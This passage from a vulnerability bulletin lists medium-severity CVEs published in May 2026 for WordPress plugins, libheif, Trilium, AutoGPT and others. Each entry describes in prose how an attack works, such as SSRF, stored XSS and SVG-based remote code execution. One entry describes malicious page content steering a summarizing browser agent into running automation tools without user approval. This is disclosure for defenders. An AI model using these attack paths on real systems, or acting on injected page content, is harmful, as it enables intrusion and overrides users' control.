https://wordpress.org/plugins/location-weather/
https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256
https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L332
 
Significant-Gravitas–AutoGPT AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.1.0 through 0.6.51, SendEmailBlock in autogpt_platform/backend/backend/blocks/email_block.py accepts a user-supplied smtp_server (string) and smtp_port (integer) as per-execution block inputs, then passes them directly to Python’s smtplib.SMTP() to open a raw TCP connection with no IP address validation. This completely bypasses the platform’s hardened SSRF protections in backend/util/request.py – the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist that every other block uses to block connections to private, loopback, link-local, and cloud metadata addresses. An authenticated user on a shared AutoGPT deployment can use this to perform non-blind internal network port scanning and service fingerprinting: smtplib reads the target’s TCP banner on connect and embeds it in the exception message, which is persisted as user-visible block output via the execution framework. This issue has been fixed in version 0.6.52. 2026-05-19 5 CVE-2026-33234 https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-4jwj-6mg5-wrwf
https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.52
 
simonholliday–Anomify AI Anomaly Detection and Alerting The Anomify AI – Anomaly Detection and Alerting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘anomify_api_key’ parameter in versions up to and including 0.3.6. This is due to insufficient input sanitization and missing output escaping: the plugin applies sanitize_text_field() to the Metric Data Key input before saving it via update_option(), but sanitize_text_field() strips HTML tags without encoding double-quote characters, and the value is then echoed directly into an HTML attribute context (value=”…”) without esc_attr(). This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts that execute whenever a user visits the plugin’s settings page. 2026-05-20 4.4 CVE-2026-6404 https://www.wordfence.com/threat-intel/vulnerabilities/id/4036057c-0c43-4d9c-97db-4861d91a4daa?source=cve
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L32
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L32
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152
 
simonholliday–Anomify AI Anomaly Detection and Alerting The Anomify AI – Anomaly Detection and Alerting plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in versions up to and including 0.3.6. This is due to missing nonce verification on the settings page handler and insufficient output escaping in the admin_options.php template. The settings form includes no wp_nonce_field() and the handler performs no check_admin_referer() check, meaning any cross-origin POST can modify plugin settings. The API key field is sanitized only with sanitize_text_field(), which strips HTML tags but does not encode double-quote characters; the value is then rendered into an HTML attribute via bare echo without esc_attr(), allowing a double-quote attribute-escape payload to survive both sanitization and storage. This makes it possible for unauthenticated attackers to inject arbitrary web scripts by tricking a logged-in administrator into visiting a malicious page that submits a forged request, storing the payload in the database and causing it to execute in the administrator’s browser whenever the plugin settings page is visited. 2026-05-20 4.3 CVE-2026-6405 https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e02c2d-a38a-495c-9c37-098049297be2?source=cve
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L31
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L31
https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152
https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152
 
smub–All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic The All in One SEO plugin for WordPress is vulnerable to Sensitive Information Exposure via ‘internalOptions’ localized script data in versions up to, and including, 4.9.7 due to sensitive internal option data being passed to wp_localize_script() in post editor contexts without effective masking for low-privilege users. This makes it possible for authenticated attackers, with contributor-level access and above, to view configured API/OAuth tokens and license-related values from page source. 2026-05-20 4.3 CVE-2026-5075 https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8bc203-c17a-4b31-8f9e-695f9e638cda?source=cve
https://plugins.trac.wordpress.org/changeset/3532318/all-in-one-seo-pack
 
smub–Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery The Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 4.2.0. This is due to insufficient object-level authorization in the image deletion REST flow where the permission callback for DELETE /imagely/v1/images/{id} only checks ‘NextGEN Manage gallery’ permissions and does not enforce gallery ownership or ‘NextGEN Manage others gallery’ permissions. This makes it possible for authenticated attackers, with Subscriber-level privileges and ‘NextGEN Manage gallery’ capability, to delete gallery images belonging to other users as well as their associated image files from disk when deleteImg is enabled (default). 2026-05-20 4.3 CVE-2026-6566 https://www.wordfence.com/threat-intel/vulnerabilities/id/439809ad-21ea-4a0b-b1fd-5de9f8f5ee7a?source=cve
https://plugins.trac.wordpress.org/changeset/3533432/nextgen-gallery
 
smub–Slider by Soliloquy Responsive Image Slider for WordPress The Slider by Soliloquy – Responsive Image Slider for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 via the map_meta_cap. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract draft slider metadata including unpublished media URLs, captions, and slider configuration authored by administrators or editors. 2026-05-22 4.3 CVE-2026-7636 https://www.wordfence.com/threat-intel/vulnerabilities/id/54115a9a-dadd-4f18-a139-02ec89f0a571?source=cve
https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L90
https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L177
https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L177
https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L125
https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L125
https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L90
https://plugins.trac.wordpress.org/changeset/3538404/soliloquy-lite/trunk/includes/global/posttype.php?old=3395148&old_path=soliloquy-lite%2Ftrunk%2Fincludes%2Fglobal%2Fposttype.php
 
SourceCodester–Hospitals Patient Records Management System A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. 2026-05-23 6.3 CVE-2026-9342 VDB-365305 | SourceCodester Hospitals Patient Records Management System view_history.php sql injection
VDB-365305 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #812834 | sourcecodester Hospital’s Patient Records Management System V1.0 SQL injection
https://github.com/july-skyload/exp/issues/1
https://www.sourcecodester.com/
 
Splunk–Splunk AI Toolkit In Splunk AI Toolkit versions below 5.7.3, a low-privileged user that does not hold the ‘admin’ or ‘power’ roles could access confidential data that was restricted through `srchFilter` configurations on custom roles.<br><br>The app contains an `authorize.conf` configuration file with a `srchFilter` entry that modifies the built-in ‘user’ role. Because the Splunk platform combines inherited search filters with the `OR` SPL operator, the injected filter overrides more restrictive filters on child roles. 2026-05-20 6.5 CVE-2026-20238 https://advisory.splunk.com/advisories/SVD-2026-0502
 
steipete–summarize Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks. 2026-05-18 6.1 CVE-2026-45243 https://github.com/steipete/summarize/releases/tag/v0.15.2
https://github.com/steipete/summarize/pull/222
https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd
https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script
 
steipete–summarize Summarize prior to 0.15.1 contains a missing authorization vulnerability that allows attackers to execute browser automation actions without per-call user approval when the extension automation feature is enabled. Attackers can influence the agent through malicious page or summary content to invoke enabled extension automation tools such as navigation or debugger-backed actions, bypassing the final user approval step when a user interacts with attacker-controlled content. 2026-05-18 5.4 CVE-2026-45244 https://github.com/steipete/summarize/releases/tag/v0.15.2
https://github.com/steipete/summarize/pull/219
https://github.com/steipete/summarize/commit/e64fe3ecd1bb4fdc181dcfa88c96b9e1914ced0e
https://www.vulncheck.com/advisories/summarize-unapproved-browser-automation-execution
 
steipete–summarize Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems. 2026-05-18 5.5 CVE-2026-45246 https://github.com/steipete/summarize/releases/tag/v0.15.2
https://github.com/steipete/summarize/pull/217
https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b
https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure
 
storybookjs–telejson TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application. 2026-05-20 6.1 CVE-2026-47099 https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv
https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md
https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function
 
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 792-byte HEIF sequence file with samples_per_chunk=0 in the stsc box causes an unsigned integer underflow in the Chunk constructor (m_last_sample = 0 + 0 - 1 = UINT32_MAX), mapping all samples to an empty chunk and resulting in a denial of service. When any sample is accessed, the library reads from index 0 of an empty std::vector, causing a guaranteed SEGV (null-page read). The file parses successfully without producing an error; the crash occurs on the first frame access. This issue has been fixed in version 1.22.0. 2026-05-19 6.5 CVE-2026-32738 https://github.com/strukturag/libheif/security/advisories/GHSA-7f2h-cmpf-v9ww
 
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 800-byte HEIF sequence file causes an infinite loop in Box_stts::get_sample_duration(), consuming 100% CPU indefinitely with zero progress, leading to DoS. The loop has no iteration limit or timeout and is triggered during file open (parsing) – before any user interaction or image decoding. The process stays alive (no crash, no error logged), making it invisible to crash-based monitoring. This issue has been fixed in version 1.22.0. 2026-05-19 6.5 CVE-2026-32739 https://github.com/strukturag/libheif/security/advisories/GHSA-j9g7-q9hv-gq8c
https://github.com/strukturag/libheif/releases/tag/v1.22.0
 
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, when decoding a HEIF grid image with strict_decoding=false (the default), a corrupted tile silently fails to decode and the library returns heif_error_Ok with no indication of failure, leading to an uninitialized heap memory information leak. The canvas is allocated via create_clone_image_at_new_size() → plane.alloc() → new (std::nothrow) uint8_t[allocation_size] which does not zero the memory; only the alpha plane is explicitly initialized via fill_plane(), so the Y, Cb, and Cr planes contain whatever was previously at that heap address. The failed tile’s region of the canvas is never written. It retains uninitialized heap data that is delivered to the caller as decoded pixel values (4,096 bytes per Y/Cb/Cr plane = 12,288+ bytes total). Any application using libheif to decode grid-based HEIF/AVIF files with default settings is vulnerable: a crafted .heic or .avif file causes 4,096+ bytes of heap memory to appear as pixel values in the decoded image, and the calling application receives heif_error_Ok, so it has no indication the output contains heap garbage. In server-side image processing, an uploaded crafted HEIF decoded and re-encoded (e.g., as PNG/JPEG for thumbnails, CDN, social media) can leak cross-user data such as auth tokens, database results, and other users’ image data. This issue has been fixed in version 1.22.0. 2026-05-19 6.5 CVE-2026-32814 https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc
https://github.com/strukturag/libheif/releases/tag/v1.22.0
 
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a malformed HEIF sequence file can trigger an out-of-bounds read in core sequence parsing logic, causing DoS. A malformed file can have stco.entry_count == 0 (creating no chunks) while still passing validation because saio.entry_count == 0 matches, but with saiz.sample_count > 0 the SampleAuxInfoReader constructor still enters its loop. This leads to an out-of-bounds dereference on the empty chunks[0] in chunked mode. 2026-05-22 6.5 CVE-2026-41069 https://github.com/strukturag/libheif/security/advisories/GHSA-p82x-fpmv-576r
https://github.com/strukturag/libheif/releases/tag/v1.22.0
 
submone–Amazon Scraper The Amazon Scraper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 4.3 CVE-2026-8419 https://www.wordfence.com/threat-intel/vulnerabilities/id/c956e4c5-bf7e-4ec4-b795-74d477a61694?source=cve
https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L49
https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L49
https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L13
https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L13
https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L26
https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L26
https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L45
https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L45
 
svil4ok–Bottom Bar The Bottom Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 0.1.7. This is due to missing nonce verification on the plugin’s settings update forms handled in bottom-bar-admin.php. None of the three settings forms (main settings, sharing services, restore defaults) include a wp_nonce_field(), and the server-side processing code never calls check_admin_referer() or any equivalent nonce validation before processing POST data and calling update_option(). This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a crafted request that updates plugin configuration options, such as changing the language, maximum post counts, or enabled sharing services. 2026-05-20 4.3 CVE-2026-6401 https://www.wordfence.com/threat-intel/vulnerabilities/id/db0715ed-a06e-4a68-b9c3-408887cae113?source=cve
https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L16
https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L16
https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L59
https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L59
 
syslink software AG–Avantra Use of default password vulnerability in syslink software AG Avantra on Linux, Windows allows Try Common or Default Usernames and Passwords. This issue affects Avantra: before 25.3.0. 2026-05-22 5.1 CVE-2026-8672 https://support.avantra.com/hc/en-us/articles/5535551609759
 
syslink software AG–Avantra Unprotected transport of credentials vulnerability in syslink software AG Avantra on Linux, Windows allows Sniffing Attacks. This issue affects Avantra: before 25.3.0. 2026-05-22 5.9 CVE-2026-8673 https://support.avantra.com/hc/en-us/articles/5535621927071
 
Talend–Talend Administration Center A stored cross-site scripting vulnerability has been found in the Talend Administration Center. An attacker with permission to manage servers can store a XSS payload that can be triggered by a different user. 2026-05-20 5.4 CVE-2026-9056 https://community.qlik.com/t5/Official-Support-Articles/Security-fix-for-Qlik-Talend-Administration-Center-cross-site/ta-p/2548522
 
TeamViewer–DEX (On-premises) A broken access control vulnerability exists in the TeamViewer DEX Platform (On‑Premises) prior version 9.2. Certain backend API endpoints do not correctly enforce authorization checks, allowing an authenticated user with low privileges to perform actions and access resources intended only for higher‑privileged roles. An attacker with low‑privileged credentials may exploit this to gain unauthorized access to administrative or sensitive functionality. 2026-05-22 5.4 CVE-2026-8381 https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2026-1005/
 
techjewel–FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution The FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.9.87 via the ‘SubscribeURL’ parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Exploitation requires that the SES bounce handling key (‘_fc_bounce_key’) has never been stored (i.e., the site is in its default/unconfigured state with respect to SES bounce handling) as visiting the bounce configuration page auto-generates and stores a random key that causes the authentication check to evaluate correctly and reject unauthenticated requests. 2026-05-22 5.4 CVE-2026-7798 https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ca2d7-7af9-401f-bc5a-1796c6253cb0?source=cve
https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L113
https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L113
https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L85
https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L85
https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L87
https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L87
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3532271%40fluent-crm&new=3532271%40fluent-crm&sfp_email=&sfph_mail=
 
Technitium–DNS Server Technitium DNS Server aggressively tries to fetch missing RRSIG records or mismatched DNSKEY records. An attacker in control of a domain can cause a vulnerable system to generate excessive network traffic. Fixed in 15.0. 2026-05-19 5.8 CVE-2026-45557 url
url
url
 
Tencent–WeKnora A vulnerability has been found in Tencent WeKnora up to 0.3.6. Affected by this issue is the function getKnowledgeBaseForInitialization of the file internal/handler/initialization.go of the component Config API Endpoint. The manipulation of the argument kbId leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-18 6.3 CVE-2026-8786 VDB-364410 | Tencent WeKnora Config API Endpoint initialization.go getKnowledgeBaseForInitialization authorization
VDB-364410 | CTI Indicators (IOB, IOC, IOA)
Submit #812172 | Tencent WeKnora <= v0.3.6 Insecure Direct Object Reference (CWE-639)
https://gist.github.com/YLChen-007/1cdc50418f29af7ae671466425e52c7b
 
themefusion–Avada (Fusion) Builder The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 3.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user (typically an administrator) accesses a page displaying dynamic user data (such as via the Dynamic Data feature pulling user biographical information). 2026-05-21 6.4 CVE-2026-1543 https://www.wordfence.com/threat-intel/vulnerabilities/id/72a6b040-ed02-4561-82f2-4adb820bdf7d?source=cve
https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
https://avada.com/documentation/avada-changelog/
 
Themeisle–Visualizer Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeisle Visualizer allows Stored XSS. This issue affects Visualizer: from n/a before 4.0.0. 2026-05-20 6.5 CVE-2026-24573 https://patchstack.com/database/wordpress/plugin/visualizer/vulnerability/wordpress-visualizer-plugin-4-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve
 
themeum–Kirki Freeform Page Builder, Website Builder & Customizer The Kirki – Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view all Kirki frontend forms and read stored visitor form submission data, including contact details, messages, and any other visitor-provided information submitted through site forms. 2026-05-19 6.5 CVE-2026-8096 https://www.wordfence.com/threat-intel/vulnerabilities/id/1a4414b1-6a49-42f8-9927-93763d1502ce?source=cve
https://plugins.trac.wordpress.org/browser/kirki/tags/6.0.4/includes/Ajax.php#L675
https://plugins.trac.wordpress.org/changeset/3535640/kirki
 
Tobias–CF7 WOW Styler Missing Authorization vulnerability in Tobias CF7 WOW Styler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CF7 WOW Styler: from n/a through 1.7.6. 2026-05-21 5.3 CVE-2026-27393 https://patchstack.com/database/wordpress/plugin/cf7-styler/vulnerability/wordpress-cf7-wow-styler-plugin-1-7-6-broken-access-control-vulnerability?_s_id=cve
 
Trend Micro, Inc.–TrendAI Apex One A directory traversal vulnerability in the Apex One (on-premise) server could allow a pre-authenticated local attacker to modify a key table on the server to inject malicious code to deploy to agents on affected installations. This vulnerability is only exploitable on the on-premise version of Apex One and a potential attacker must have access to the Apex One Server and already obtained administrative credentials to the server via some other method to exploit this vulnerability. 2026-05-21 6.7 CVE-2026-34926 https://success.trendmicro.com/en-US/solution/KA-0023430
https://success.trendmicro.com/ja-JP/solution/KA-0022974
https://jvn.jp/en/vu/JVNVU90583059/
https://www.jpcert.or.jp/english/at/2026/at260014.html
 
TriliumNext–Trilium Trilium Notes is an open-source, cross-platform hierarchical note taking application for building large personal knowledge bases. Versions 0.102.1 and prior are vulnerable to Local File Inclusion, allowing an authenticated attacker to read sensitive arbitrary files from the server’s filesystem. The uploadModifiedFileToAttachment function, which is called when a POST request is received to /api/attachments/{attachmentId}/upload-modified-file, replaces the content of the attachment with the content from another file (whose path is provided in filePath of Request body). After which the content of the attachment can be viewed at /api/attachments/{attachmentId}/download. This exposes sensitive system files such as SSH keys, credentials, configs, and OS files, potentially leading to remote code execution and compromise of co-hosted applications. This issue has been fixed in version 0.102.2. 2026-05-19 6.8 CVE-2026-35593 https://github.com/TriliumNext/Trilium/security/advisories/GHSA-hf4x-22rg-pjjp
https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2
 
TriliumNext–Trilium Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Versions 0.102.1 and prior contain a critical security flaw where lack of SVG sanitization combined with a disabled Content Security Policy (CSP) and a publicly reachable backend execution API results in an unauthenticated Remote Code Execution (RCE). The vulnerability arises from an insecure-by-design architecture: Trilium serves SVG attachments with the image/svg+xml MIME type without any sanitization, and it explicitly disables Helmet’s Content Security Policy middleware, removing the primary defense against script execution in served assets. Because the malicious SVG runs under the Same-Origin Policy, it can issue a fetch(‘/’) to extract the csrfToken from the document body. With that token, it can send a signed request to /api/script/exec to execute arbitrary Node.js code on the server. An attacker can compromise the entire server instance simply by tricking an authenticated user into viewing a shared SVG attachment. The issue has been fixed in version 0.102.2. 2026-05-20 6.8 CVE-2026-39311 https://github.com/TriliumNext/Trilium/security/advisories/GHSA-p837-cxw3-m964
https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2
 
TriliumNext–Trilium Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Electron configuration is vulnerable to TCC Bypass via Prompt Spoofing, allowing local attackers to trigger misleading macOS permission prompts by running malicious code under the identity of the trusted app. The root cause is that the RunAsNode fuse allows launching the app in a special Node.js mode using -e to execute arbitrary system commands with Trilium Notes’s permissions and identity. An attacker can leverage this through a subprocess to request any sensitive permissions, such as access to hardware (camera, microphone) and TCC-protected files, causing the TCC system prompt to appear as if the request came from Trilium rather than the attacker’s code, because macOS treats the subprocess as part of the parent application. Exploitation allows access to TCC-protected resources like the screen, camera, microphone, and folders such as ~/Documents and ~/Downloads, undermining macOS’s security model and UI integrity through social engineering. This issue has been fixed in version 0.102.2. 2026-05-19 5.5 CVE-2026-39309 https://github.com/TriliumNext/Trilium/security/advisories/GHSA-66pm-8hvq-2wwx
https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2
 
Turkiye Electricity Transmission Corporation (TEA)–Mobile Application Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Brute Force. This issue affects Mobile Application: from 1.6.2 before 1.13. 2026-05-21 6.3 CVE-2026-1816 https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286
 
Turkiye Electricity Transmission Corporation (TEA)–Mobile Application Insufficient session expiration vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Session Hijacking. This issue affects Mobile Application: from 1.6.2 before 1.13. 2026-05-21 5.7 CVE-2026-1815 https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286
 
UserSpice–userSpice userSpice 4.3.24 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the X-Forwarded-For HTTP header. Attackers can send crafted requests to the backup.php endpoint with XSS payloads in the X-Forwarded-For header that execute when administrators visit the audit log page. 2026-05-23 6.1 CVE-2018-25349 ExploitDB-44871
VulnCheck Advisory: userSpice 4.3.24 Cross-Site Scripting via X-Forwarded-For Header
 
vatanyazilim–VatanSMS WP SMS The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. 2026-05-20 6.1 CVE-2026-7462 https://www.wordfence.com/threat-intel/vulnerabilities/id/96ef8459-1600-4ca0-93c6-0ee42f8adabd?source=cve
https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/groups/groups.php#L34
https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/outbox/outbox.php#L5
https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/subscribers/subscribers.php#L128
 
VillaTheme–HAPPY Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.10. 2026-05-21 6.5 CVE-2026-39593 https://patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve
 
Webmin–Webmin Webmin before 2.641 contains a stored cross-site scripting vulnerability in the email template description field of the System and Server Status module that allows low-privileged authenticated attackers to execute arbitrary JavaScript in the browser context of administrators by injecting unsanitized input stored in save_tmpl.cgi and rendered unescaped in list_tmpls.cgi. 2026-05-21 5.4 CVE-2026-22678 https://webmin.com/changelog/webmin-2.641-released/
https://www.vulncheck.com/advisories/webmin-stored-xss-via-system-and-server-status
 
winking–Word 2 Cash The Word 2 Cash plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in versions up to and including 0.9.2. This is due to the complete absence of nonce verification on the settings save handler in the w2c_admin() function, combined with missing input sanitization before storage and missing output escaping when rendering the stored value. The w2c-definitions POST parameter is saved raw via update_option() and later echoed without escaping inside a <textarea> element. This makes it possible for unauthenticated attackers to forge a request on behalf of a logged-in administrator, storing arbitrary JavaScript payloads that execute in the WordPress admin panel whenever the settings page is visited. 2026-05-20 6.1 CVE-2026-6395 https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7ca5c-38aa-4413-83eb-29185cca2a74?source=cve
https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L31
https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L31
https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L20
https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L20
https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L18
https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L18
 
WP Chill–Image Photo Gallery Final Tiles Grid Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11. 2026-05-20 4.3 CVE-2026-27424 https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve
 
wpbean–WPB Floating Menu or Categories Sticky Floating Side Menu & Categories with Icons The WPB Floating Menu & Categories for WordPress – Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Icon CSS Class’ category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-05-21 4.9 CVE-2026-4811 https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve
